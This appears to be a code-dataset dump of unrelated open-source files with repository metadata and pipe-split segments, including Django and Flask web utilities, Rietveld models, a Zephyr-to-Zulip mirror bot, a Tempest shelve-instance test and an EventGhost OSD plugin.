# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'invenio-communities_namedoc' |
ProgDan/maratona | Maratona_Python/OBI2013/tomadas.py | Python | gpl-3.0 | 140 | 0.014286 | #!/ | usr/bin/python
#coding: utf-8
T1, T2, T3, T4 = map(int,input().split())
s = int(T1) + int(T2) + int(T3) + int(T4) - 3
print(s)
exit(0 | )
|
open-ods/open-ods | openods/request_utils.py | Python | gpl-3.0 | 1,400 | 0.004286 | import uuid
from flask import g
# Utility method to get source_ip from a request - first checks headers for forwarded IP, then uses remote_addr if not
def get_source_ip(my_request):
try:
# First check for an X-Forwarded-For header provided by a proxy / router e.g. on Heroku
source_ip = my_request.headers['X-F | orwarded-For']
except KeyError:
try:
# First check for an X-Forwarded-For header provided by a proxy / router e.g. on Heroku
source_ip = my_request.head | ers['X-Client-IP']
except KeyError:
# If that header is not present, attempt to get the Source IP address from the request itself
source_ip = my_request.remote_addr
g.source_ip = source_ip
return source_ip
# Utility method to get the request_id from the X-Request-Id header, and if not present generate one
def get_request_id(my_request):
try:
request_id = my_request.headers['X-Request-Id']
except KeyError:
request_id = str(uuid.uuid4())
g.request_id = request_id
return request_id
# Utility method which takes a dict of request parameters and writes them out as pipe delimeted kv pairs
def dict_to_piped_kv_pairs(dict_for_conversion):
output_string = ""
for key, value in sorted(dict_for_conversion.items()):
output_string += "{0}={1}|".format(key, value)
return output_string
|
m-garanin/conference | urls.py | Python | bsd-3-clause | 526 | 0.007605 | from django.conf.urls.defaults import patterns, include, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()
urlpatterns = patte | rns('',
url(r'^admin/', include(admin.site.urls)),
(r'^site_media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),
(r'^storage/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings. | MEDIA_ROOT}),
url(r'', include('mbco.conference.app.urls')),
url(r'^', include('cms.urls')),
)
|
acourt/doortracker | doorreport/doorlogger/models.py | Python | gpl-3.0 | 531 | 0.035782 | from django.db import models
from datetime import datetime
class Door(models.Model):
door_name = models.CharField(max_length=144)
door_type = models.CharField(max_length=35)
def __str__(self):
return self.door_name
class Event(models.Model | ):
door = models.ForeignKey(Door, on_delete=models.CASCADE)
event_type = models.CharField(max_length=20)
open_level = models.IntegerField(default=0)
ti | me_stamp = models.DateTimeField('time stamp')
def __str__(self):
return ("%s: %d" % (self.event_type, self.open_level)) |
KrzysiekJ/django-getpaid | getpaid/utils.py | Python | mit | 1,875 | 0.002133 | from django.conf import settings
import sys
def import_name(name):
components = name.split('.')
if len(components) == 1:
# direct module, import the module directly
mod = __import__(name, globals(), locals(), [name])
else:
# the module is within another, so we
# need to import it from there
parent_path = components[0:-1]
module_name = components[-1]
parent_mod = __import__(
'.'.join(parent_path), globals(), locals(), [module_name])
mod = getattr(parent_mod, components[-1])
return mod
def import_backend_modules(submodule=None):
backends = getattr(settings, 'GETPAID_BACKENDS', [])
modules = {}
for backend_name in backends:
fqmn = backend_name
if submodule:
fqmn = | '%s.%s' % (fqmn, submodule)
__import__(fqmn)
module = sys.modules[fqmn]
modules[backend_name] = module
return modules
def get_backend_choices(currency=None):
"""
Get active backends modules. Backend list can be filtered by supporting given currency.
"""
choices = []
backends_names = | getattr(settings, 'GETPAID_BACKENDS', [])
for backend_name in backends_names:
backend = import_name(backend_name)
if currency:
if currency in backend.PaymentProcessor.BACKEND_ACCEPTED_CURRENCY:
choices.append((backend_name, backend.PaymentProcessor.BACKEND_NAME, ))
else:
choices.append((backend_name, backend.PaymentProcessor.BACKEND_NAME, ))
return choices
def get_backend_settings(backend):
"""
Returns backend settings. If it does not exist it fails back to empty dict().
"""
backends_settings = getattr(settings, 'GETPAID_BACKENDS_SETTINGS', {})
try:
return backends_settings[backend]
except KeyError:
return {}
|
pravinas/et-maslab-2016 | sandbox/test_hugs.py | Python | mit | 2,236 | 0.00805 | from tamproxy import SyncedSketch, Timer
from tamproxy.devices import Motor, Encoder
# Cycles a motor back and forth between -255 and 255 PWM every ~5 seconds
HUGS_MOTOR_CONTROLLER_DIRECTION = 8
HUGS_MOTOR_CONTROLLER_PWM = 9
HUGS_MOTOR_ENCODER_YELLOW = 31
HUGS_MOT | OR_ENCODER_WHITE = 32
# The limit point at which the motor is considered stalled.
INTAKE_ENCODER_LIMIT = 150
# The speed of the intake motors.
INTAKE_POWER = 120
class HugTest(SyncedSketch):
def setup(self):
# Motor object representing the intake mechanism motors.
self.intakeMotor = Motor(self.tamp, HU | GS_MOTOR_CONTROLLER_DIRECTION, HUGS_MOTOR_CONTROLLER_PWM)
# Encoder object for the intake motor.
self.intakeEncoder = Encoder(self.tamp, HUGS_MOTOR_ENCODER_YELLOW, HUGS_MOTOR_ENCODER_WHITE)
# Timer object to moderate checking for intake errors.
self.intakeTimer = Timer()
# Are the intake motors going forward? True if so, False if reversing.
self.intakeDirection = False
# Start the intake motor.
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
def loop(self):
self.checkForIntakeErrors()
def checkForIntakeErrors(self, checkTime = 1000, reverseTime = 3000):
if self.intakeDirection: # We are moving forward.
if self.intakeTimer.millis() > checkTime:
self.intakeTimer.reset()
if self.intakeEncoder.val < INTAKE_ENCODER_LIMIT: # if we're stalled
self.intakeDirection = True
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
else: # if we're not stalled
self.intakeEncoder.write(0)
else: # We are reversing the motors.
if self.intakeTimer.millis() > reverseTime:
self.intakeTimer.reset()
self.intakeDirection = False
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
self.intakeEncoder.write(0)
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
if __name__ == "__main__":
sketch = HugTest(1, -0.00001, 100)
sketch.run() |
georgeyk/quickstartup | quickstartup/website/urls.py | Python | mit | 158 | 0.006329 | # coding: utf-8
from django.conf.urls import p | atterns, url
urlpatterns = patterns('',
| url(r"^$", "quickstartup.website.views.index", name="index"),
)
|
skagedal/fido | experiments/test.py | Python | gpl-2.0 | 3,542 | 0.008752 | from __future__ import print_function
import sqlite3
import time
from datetime import datetime
def adapt_datetime(ts):
return int(time.mktime(ts.timetuple()))
sqlite3.register_adapter(datetime, adapt_datetime)
def pp(cursor, data=None, rowlens=0):
d = | cursor.description
if not d:
return "#### NO RESULTS ###"
names = []
lengths = []
rules = []
if not data:
data = cursor.fetchall()
for dd in d: # iterate over description
l = dd[1]
if not l:
l = 12 # or default arg ...
l = max(l, | len(dd[0])) # handle long names
names.append(dd[0])
lengths.append(l)
for col in range(len(lengths)):
if rowlens:
rls = [len(str(row[col])) for row in data if row[col]]
lengths[col] = max([lengths[col]]+rls)
rules.append("-"*lengths[col])
format = " ".join(["%%-%ss" % l for l in lengths])
result = [format % tuple(names)]
result.append(format % tuple(rules))
for row in data:
result.append(format % row)
return "\n".join(result)
def create_tables(c):
c.execute('''
CREATE TABLE items (
item_title TEXT,
item_content TEXT,
item_posted INTEGER,
item_updated INTEGER,
item_is_read INTEGER DEFAULT 0,
item_mute INTEGER,
feed_id INTEGER NOT NULL
)
''')
c.execute('''
CREATE TABLE feeds (
feed_id INTEGER PRIMARY KEY,
feed_title TEXT,
feed_metadata TEXT,
feed_priority INTEGER DEFAULT 0,
feed_mute INTEGER
)
''')
STEVES_FOOD = 1
FRIEND_TOM = 2
WORK_STUFF = 3
TIME_WASTE = 4
def create_feeds(c):
c.executemany('''INSERT INTO feeds (feed_title, feed_id, feed_priority) VALUES (?, ?, ?)''',
[("Steve's Food", STEVES_FOOD, 0),
('Friend Tom', FRIEND_TOM, 2),
('Work Stuff', WORK_STUFF, 1),
('Time Waste', TIME_WASTE, 0)])
def create_items(c):
c.executemany('''
INSERT INTO items (
item_title,
feed_id,
item_is_read,
item_updated
) VALUES (?, ?, ?, ?)''',
[('Sandwich!', STEVES_FOOD, False, datetime(2012, 11, 01)),
('Work more!', WORK_STUFF, False, datetime(2011, 01, 05)),
('Work less!', WORK_STUFF, False, datetime(2010, 01, 05)),
('Tom says Hi!', FRIEND_TOM, False, datetime(2009, 01, 01)),
('Old sandwich', STEVES_FOOD, True, datetime(2008, 01, 01))
])
def test():
conn = sqlite3.connect(':memory:')
c = conn.cursor()
create_tables(c)
create_feeds(c)
create_items(c)
# c.execute('SELECT * FROM feeds')
# print ()
# print (pp (c))
# c.execute('SELECT * FROM items')
# print ()
# print (pp (c))
c.execute("""
SELECT item_title, feed_title, feed_priority, item_updated FROM items, feeds USING (feed_id)
WHERE item_is_read = 0
ORDER BY feed_priority DESC, item_updated
""")
print ()
print (pp (c))
print ()
return conn
test()
|
kscharding/integral-solutions-smxq | codereview/models.py | Python | apache-2.0 | 28,836 | 0.01082 | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App Engine data model (schema) definition for Rietveld."""
import logging
import md5
import os
import re
import time
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.api import users
from google.appengine.ext import db
from django.conf import settings
from codereview import patching
from codereview import utils
from codereview.exceptions import FetchError
CONTEXT_CHOICES = (3, 10, 25, 50, 75, 100)
### GQL query cache ###
_query_cache = {}
def gql(cls, clause, *args, **kwds):
"""Return a query object, from the cache if possible.
Args:
cls: a db.Model subclass.
clause: a query clause, e.g. 'WHERE draft = TRUE'.
*args, **kwds: positional and keyword arguments to be bound to the query.
Returns:
A db.GqlQuery instance corresponding to the query with *args and
**kwds bound to the query.
"""
query_string = 'SELECT * FROM %s %s' % (cls.kind(), clause)
query = _query_cache.get(query_string)
if query is None:
_query_cache[query_string] = query = db.GqlQuery(query_string)
query.bind(*args, **kwds)
return query
### Issues, PatchSets, Patches, Contents, Comments, Messages ###
class Issue(db.Model):
"""The major top-level entity.
It has one or more PatchSets as its descendants.
"""
subject = db.StringProperty(required=True)
description = db.TextProperty()
#: in Subversion - repository path (URL) for files in patch set
base = db.StringProperty()
#: if True then base files for patches were uploaded with upload.py
#: (if False - then Rietveld attempts to download them from server)
local_base = db.BooleanProperty(default=False)
repo_guid = db.StringProperty()
owner = db.UserProperty(auto_current_user_add=True, required=True)
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
reviewers = db | .ListProperty(db.Email)
cc = db.ListProperty(db.Email)
closed = db.BooleanProperty(default=False)
private = db.BooleanProperty(default=False)
n_comme | nts = db.IntegerProperty()
_is_starred = None
@property
def is_starred(self):
"""Whether the current user has this issue starred."""
if self._is_starred is not None:
return self._is_starred
account = Account.current_user_account
self._is_starred = account is not None and self.key().id() in account.stars
return self._is_starred
def user_can_edit(self, user):
"""Return true if the given user has permission to edit this issue."""
return user and (user == self.owner or self.is_collaborator(user)
or users.is_current_user_admin())
@property
def edit_allowed(self):
"""Whether the current user can edit this issue."""
account = Account.current_user_account
if account is None:
return False
return self.user_can_edit(account.user)
def update_comment_count(self, n):
"""Increment the n_comments property by n.
If n_comments in None, compute the count through a query. (This
is a transitional strategy while the database contains Issues
created using a previous version of the schema.)
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
self.n_comments += n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, it is computed through a query, and stored,
using n_comments as a cache.
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
return self.n_comments
def _get_num_comments(self):
"""Helper to compute the number of comments through a query."""
return gql(Comment,
'WHERE ANCESTOR IS :1 AND draft = FALSE',
self).count()
_num_drafts = None
@property
def num_drafts(self):
"""The number of draft comments on this issue for the current user.
The value is expensive to compute, so it is cached.
"""
if self._num_drafts is None:
account = Account.current_user_account
if account is None:
self._num_drafts = 0
else:
query = gql(Comment,
'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE',
self, account.user)
self._num_drafts = query.count()
return self._num_drafts
@staticmethod
def _collaborator_emails_from_description(description):
"""Parses a description, returning collaborator email addresses.
Broken out for unit testing.
"""
collaborators = []
for line in description.splitlines():
m = re.match(
r'\s*COLLABORATOR\s*='
r'\s*([a-zA-Z0-9._]+@[a-zA-Z0-9_]+\.[a-zA-Z0-9._]+)\s*',
line)
if m:
collaborators.append(m.group(1))
return collaborators
def collaborator_emails(self):
"""Returns a possibly empty list of emails specified in
COLLABORATOR= lines.
Note that one COLLABORATOR= lines is required per address.
"""
if not self.description:
return []
return Issue._collaborator_emails_from_description(self.description)
def is_collaborator(self, user):
"""Returns true if the given user is a collaborator on this issue.
This is determined by checking if the user's email is listed as a
collaborator email.
"""
if not user:
return False
return user.email() in self.collaborator_emails()
class PatchSet(db.Model):
"""A set of patchset uploaded together.
This is a descendant of an Issue and has Patches as descendants.
"""
issue = db.ReferenceProperty(Issue) # == parent
message = db.StringProperty()
data = db.BlobProperty()
url = db.LinkProperty()
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
n_comments = db.IntegerProperty(default=0)
def update_comment_count(self, n):
"""Increment the n_comments property by n."""
self.n_comments = self.num_comments + n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, 0 is returned.
"""
# For older patchsets n_comments is None.
return self.n_comments or 0
class Message(db.Model):
"""A copy of a message sent out in email.
This is a descendant of an Issue.
"""
issue = db.ReferenceProperty(Issue) # == parent
subject = db.StringProperty()
sender = db.EmailProperty()
recipients = db.ListProperty(db.Email)
date = db.DateTimeProperty(auto_now_add=True)
text = db.TextProperty()
draft = db.BooleanProperty(default=False)
in_reply_to = db.SelfReferenceProperty()
issue_was_closed = db.BooleanProperty(default=False)
_approval = None
_disapproval = None
def find(self, text):
"""Returns True when the message says text and is not written by the issue owner."""
# Must not be issue owner.
# Must contain text in a line that doesn't start with '>'.
return self.issue.owner.email() != self.sender and any(
True for line in self.text.lower().splitlines()
if not line.strip().startswith('>') and text in line)
@property
def approval(self):
"""Is True when the message represents an approval of the review."""
if self._approval is None:
self._approval = self.find('lgtm') and not self.find('not lgtm')
return self._approval
@property
def disapproval(self):
"""Is True when the message represents a disapproval of the review."""
if self._disapproval is None:
s |
corumcorp/redsentir | redsentir/lineatiempo/views.py | Python | gpl-3.0 | 2,842 | 0.017241 | # -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import *
@login_required
def inicio(request):
if not request.user.perfil.es_joven and not request.user.is_superuser:
return redirect('mesa:inicio')
if request.POST :
if not 'publicacion' in request.POST or request.POST['publicacion']==None or request.POST['publicacion']=='':
imagenes = request.FILES.getlist('imagenes')
publicacion = Publicacion(contenido=request.POST['contenido'],usuario=request.user,num_img=len(imagenes))
publicacion.save()
for imagen in imagenes :
multiMedia = MultiMedia(publicacion=publicacion,archivo=imagen,tipo='imagen').save()
if 'video' in request.FILES :
video = MultiMedia(publicacion=publicacion,archivo=request.FILES['video'],tipo='video').save()
if 'audio' in request.FILES :
video = MultiMedia(publicacion=publicacion,archivo=request.FILES['audio'],tipo='video').save()
elif request.POST['accion'] == 'guardar_comentario':
comentario = ComentarioP(publicacion_id=request.POST['publicacion'],usuario = request.user)
if 'imagen_c' in request.FILES:
| comentario.imagen = request.FILES['imagen_c' | ]
if 'contenido' in request.POST :
comentario.contenido = request.POST['contenido']
comentario.save()
Publicacion.objects.filter(pk=comentario.publicacion_id).update(comentarios=(comentario.publicacion.comentarios+1))
elif 'accion' in request.POST and request.POST['accion']=='borrar':
publicacion = Publicacion.objects.get(pk=request.POST['publicacion'])
publicacion.delete()
elif 'accion' in request.POST and request.POST['accion']=='borrar_comentario':
comentario = ComentarioP.objects.get(pk=request.POST['comentario'])
comentario.delete()
Publicacion.objects.filter(pk=comentario.publicacion_id).update(comentarios=(comentario.publicacion.comentarios-1))
publicaciones = Publicacion.objects.all().order_by('id').reverse()[:50]
return render(request, 'sitio/lineatiempo/inicio.html',{'publicaciones':publicaciones})
@login_required
def meGustaP(request,pid):
publicacion = Publicacion.objects.get(pk=pid)
publicacion.me_gusta +=1
publicacion.save()
return redirect ('https://redsentir.org/lineatiempo/#publicacion_'+str(publicacion.pk))
@login_required
def meGustaCP(request,pid):
comentarioP = ComentarioP.objects.get(pk=pid)
comentarioP.me_gusta +=1
comentarioP.save()
return redirect ('https://redsentir.org/lineatiempo/#publicacion_'+str(comentarioP.publicacion_id))
|
andersonjonathan/Navitas | navitas/contact/models.py | Python | mit | 391 | 0 | f | rom django.db import models
from django.utils.translation import ugettext_lazy as _
class Contact(models.Model):
name = models.CharField(max_length=255, verbose_name=_("namn"))
email = models.EmailField(verbose_name=_("e-post"))
def __s | tr__(self):
return self.name
class Meta:
verbose_name = _("Kontaktval")
verbose_name_plural = _("Kontaktval")
|
samatdav/zulip | bots/zephyr_mirror_backend.py | Python | apache-2.0 | 48,314 | 0.002235 | #!/usr/bin/env python
# Copyright (C) 2012 Zulip, Inc.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from typing import IO, Any, Text, Union, Set, Tuple
from types import FrameType
import sys
from six.moves import map
from six.moves import range
try:
import simplejson
except ImportError:
import json as simplejson # type: ignore
import re
import time
import subprocess
import optparse
import os
import datetime
import textwrap
import time
import signal
import logging
import hashlib
import tempfile
import select
DEFAULT_SITE = "https://api.zulip.com"
class States(object):
Startup, ZulipToZephyr, ZephyrToZulip, ChildSending = list(range(4))
CURRENT_STATE = States.Startup
logger = None # type: logging.Logger
def to_zulip_username(zephyr_username):
# type: (str) -> str
if "@" in zephyr_username:
(user, realm) = zephyr_username.split("@")
else:
(user, realm) = (zephyr_username, "ATHENA.MIT.EDU")
if realm.upper() == "ATHENA.MIT.EDU":
# Hack to make ctl's fake username setup work :)
if user.lower() == 'golem':
user = 'ctl'
return user.lower() + "@mit.edu"
return user.lower() + "|" + realm.upper() + "@mit.edu"
def to_zephyr_username(zulip_username):
# type: (str) -> str
(user, realm) = zulip_username.split("@")
if "|" not in user:
# Hack to make ctl's fake username setup work :)
if user.lower() == 'ctl':
user = 'golem'
return user.lower() + "@ATHENA.MIT.EDU"
match_user = re.match(r'([a-zA-Z0-9_]+)\|(.+)', user)
if not match_user:
raise Exception("Could not parse Zephyr realm for cross-realm user %s" % (zulip_username,))
return match_user.group(1).lower() + "@" + match_user.group(2).upper()
# Checks whether the pair of adjacent lines would have been
# linewrapped together, had they been intended to be parts of the same
# paragraph. Our check is whether if you move the first word on the
# 2nd line onto the first line, the resulting line is either (1)
# significantly shorter than the following line (which, if they were
# in the same paragraph, should have been wrapped in a way consistent
# with how the previous line was wrapped) or (2) shorter than 60
# characters (our assumed minimum linewrapping threshold for Zephyr)
# or (3) the first word of the next line is longer than this entire
# line.
def different_paragraph(line, next_line):
# type: (str, str) -> bool
words = next_line.split()
return (len(line + " " + words[0]) < len(next_line) * 0.8 or
len(line + " " + words[0]) < 50 or
len(line) < len(words[0]))
# Linewrapping algorithm based on:
# http://gcbenison.wordpress.com/2011/07/03/a-program-to-intelligently-remove-carriage-returns-so-you-can-paste-text-without-having-it-look-awful/ #ignorelongline
def unwrap_lines(body):
# type: (str) -> str
lines = body.split("\n")
result = ""
previous_line = lines[0]
for line in lines[1:]:
line = line.rstrip()
if (re.match(r'^\W', line, flags=re.UNICODE) and
re.match(r'^\W', previous_line, flags=re.UNICODE)):
result += previous_line + "\n"
elif (line == "" or
previous_line == "" or
re.match(r'^\W', line, flags=re.UNICODE) or
different_paragraph(previous_line, line)):
# Use 2 newlines to separate sections so that we
# trigger proper Markdown processing on things like
# bulleted lists
result += previous_line + "\n\n"
else:
result += previous_line + " "
previous_line = line
result += previous_line
return result
def send_zulip(zeph):
# type: (Dict[str, str]) -> Dict[str, str]
message = {}
if options.forward_class_messages:
message["forged"] = "yes"
message['type'] = zeph['type']
message['time'] = zeph['time']
message['sender'] = to_zulip_username(zeph['sender'])
if "subject" in zeph:
# Truncate the subject to the current limit in Zulip. No
# need to do this for stream names, since we're only
# subscribed to valid stream names.
message["subject"] = zeph["subject"][:60]
if zeph['type'] == 'stream':
# Forward messages sent to -c foo -i bar to stream bar subject "instance"
if zeph["stream"] == "message":
message['to'] = zeph['subject'].lower()
message['subject'] = "instance %s" % (zeph['subject'],)
elif zeph["stream"] == "tabbott-test5":
message['to'] = zeph['subject'].lower()
message['subject'] = "test instance %s" % (zeph['subject'],)
else:
message["to"] = zeph["stream"]
else:
message["to"] = zeph["recipient"]
message['content'] = unwrap_lines(zeph['content'])
if options.test_mode and options.site == DEFAULT_SITE:
logger.debug("Message is: %s" % (str(message),))
return {'result': "success"}
return zulip_client.send_message(message)
def send_error_zulip(error_msg):
# type: (str) -> None
message = {"type": "private",
"sender": zulip_account_email,
"to": zulip_account_email,
"content": error_msg,
}
zulip_client.send_message(message)
current_zephyr_subs = set()
def zephyr_bulk_subscribe(subs):
# type: (List[Tuple[str, str, str]]) -> None
try:
zephyr._z.subAll(subs)
except IOError:
# Since we haven't added the subscription to
# current_zephyr_subs yet, we can just return (so that we'll
# continue processing normal messages) and we'll end up
# retrying the next time the bot checks its subscriptions are
# up to date.
logger.exception("Error subscribing to streams (will retry automatically):")
logger.warning("Streams were: %s" % ([cls for cls, instance, recipient in subs],))
return
try:
actual_zephyr_subs = [cls for (cls, _, _) in zephyr._z.getSubscriptions()]
except IOError:
logger.exception("Error getting current Zephyr subscriptions")
# Don't add anything to current_zephyr_subs so that we'll
# retry the next time we check for streams to subscribe to
# (within 15 seconds).
return
for (cls, instance, recipient) in subs:
if cls not in actual_zephyr_subs:
logger.error("Zephyr failed to subscribe us to %s; will retry" % (cls,))
try:
# We'll retry automatically when we next check for
# streams to subscribe to (within 1 | 5 seconds), but
# it's worth doing 1 retry immediately to avoid
# missing 15 seconds of messages on the affected
# classes
zephyr._z.sub(cls, instance, recipient)
except IOError:
pass
else:
| current_zephyr_subs.add(cls)
def update_subscriptions():
# type: () -> None
try:
f = open(options.stream_file_path, "r")
public_streams = simplejson.loads(f.read())
f.clos |
varunarya10/tempest | tempest/scenario/test_shelve_instance.py | Python | apache-2.0 | 4,194 | 0 | # Copyright 2014 Scality
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
import testtools
from tempest.common import waiters
from tempest import config
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = log.getLogger(__name__)
class TestShelveInstance(manager.ScenarioTest):
"""
This test shelves then unshelves a Nova instance
The following is the scenario outline:
* boot a instance and create a timestamp file in it
* shelve the instance
* unshelve the instance
* check the existence of the timestamp file in the unshelved instance
"""
def _write_timestamp(self, server_or_ip):
ssh_client = self.get_remote_client(server_or_ip)
ssh_client.exec_command('date > /tmp/timestamp; sync')
self.timestamp = ssh_client.exec_command('cat /tmp/timestamp')
def _check_timestamp(self, server_or_ip):
ssh_client = self.get_remote_client(server_or_ip)
got_timestamp = ssh_client.exec_command('cat /tmp/timestamp')
self.assertEqual(self.timestamp, got_timestamp)
def _shelve_then_unshelve_server(self, server):
self.servers_client.shelve_server(server['id'])
offload_time = CONF.compute.shelved_offload_time
if offload_time >= 0:
waiters.wait_for_server_status(self.servers_client, server['id'],
'SHELVED_OFFLOADED',
extra_timeout=offload_time)
else:
waiters.wait_for_server_status(self.servers_client,
server['id'], 'SHELVED')
self.servers_client.shelve_offload_server(server['id'])
waiters.wait_for_server_status(self.servers_client, server['id'],
'SHELVED_OFFLOADED')
self.servers_client.unshelve_server(server['id'])
waiters.wait_for_server_status(self.servers_client, server['id'],
'ACTIVE')
@test.idempotent_id('11 | 64e700-0af0-4a4c-8792-35909a88743c')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@test.services('compute', 'network', 'image')
def test_shelve_instance(self):
self.keypair = self.create_keypair()
self.security_group = self._create_security_group()
security_groups = [{'name': self.security_group['name']}]
crea | te_kwargs = {
'key_name': self.keypair['name'],
'security_groups': security_groups
}
server = self.create_server(image=CONF.compute.image_ref,
create_kwargs=create_kwargs)
if CONF.compute.use_floatingip_for_ssh:
floating_ip = self.floating_ips_client.create_floating_ip()
self.addCleanup(self.delete_wrapper,
self.floating_ips_client.delete_floating_ip,
floating_ip['id'])
self.floating_ips_client.associate_floating_ip_to_server(
floating_ip['ip'], server['id'])
self._write_timestamp(floating_ip['ip'])
else:
self._write_timestamp(server)
# Prevent bug #1257594 from coming back
# Unshelve used to boot the instance with the original image, not
# with the instance snapshot
self._shelve_then_unshelve_server(server)
if CONF.compute.use_floatingip_for_ssh:
self._check_timestamp(floating_ip['ip'])
else:
self._check_timestamp(server)
|
tfroehlich82/EventGhost | plugins/EventGhost/ShowOSD.py | Python | gpl-2.0 | 17,182 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2020 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
| #
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, | see <http://www.gnu.org/licenses/>.
import threading
from os import listdir
from os.path import abspath, dirname, join
import wx
import eg
from eg.WinApi.Dynamic import (
CreateEvent,
SetEvent,
SetWindowPos,
SWP_FRAMECHANGED,
SWP_HIDEWINDOW,
SWP_NOACTIVATE,
SWP_NOOWNERZORDER,
SWP_SHOWWINDOW,
)
from eg.WinApi.Utils import GetMonitorDimensions
HWND_FLAGS = SWP_NOACTIVATE | SWP_NOOWNERZORDER | SWP_FRAMECHANGED
SKIN_DIR = join(
abspath(dirname(__file__.decode('mbcs'))),
"OsdSkins"
)
SKINS = [name[:-3] for name in listdir(SKIN_DIR) if name.endswith(".py")]
SKINS.sort()
DEFAULT_FONT_INFO = wx.Font(
18,
wx.SWISS,
wx.NORMAL,
wx.BOLD
).GetNativeFontInfoDesc()
class ShowOSD(eg.ActionBase):
name = "Show OSD"
description = "Shows a simple On Screen Display."
iconFile = "icons/ShowOSD"
class text:
label = "Show OSD: %s"
editText = "Text to display:"
osdFont = "Text Font:"
osdColour = "Text Colour:"
outlineFont = "Outline OSD"
alignment = "Alignment:"
alignmentChoices = [
"Top Left",
"Top Right",
"Bottom Left",
"Bottom Right",
"Screen Center",
"Bottom Center",
"Top Center",
"Left Center",
"Right Center",
]
display = "Show on display:"
xOffset = "Horizontal offset X:"
yOffset = "Vertical offset Y:"
wait1 = "Autohide OSD after"
wait2 = "seconds (0 = never)"
skin = "Use skin"
def __call__(
self,
osdText="",
fontInfo=None,
foregroundColour=(255, 255, 255),
backgroundColour=(0, 0, 0),
alignment=0,
offset=(0, 0),
displayNumber=0,
timeout=3.0,
skin=None
):
if isinstance(skin, bool):
skin = SKINS[0] if skin else None
self.osdFrame.timer.cancel()
osdText = eg.ParseString(osdText)
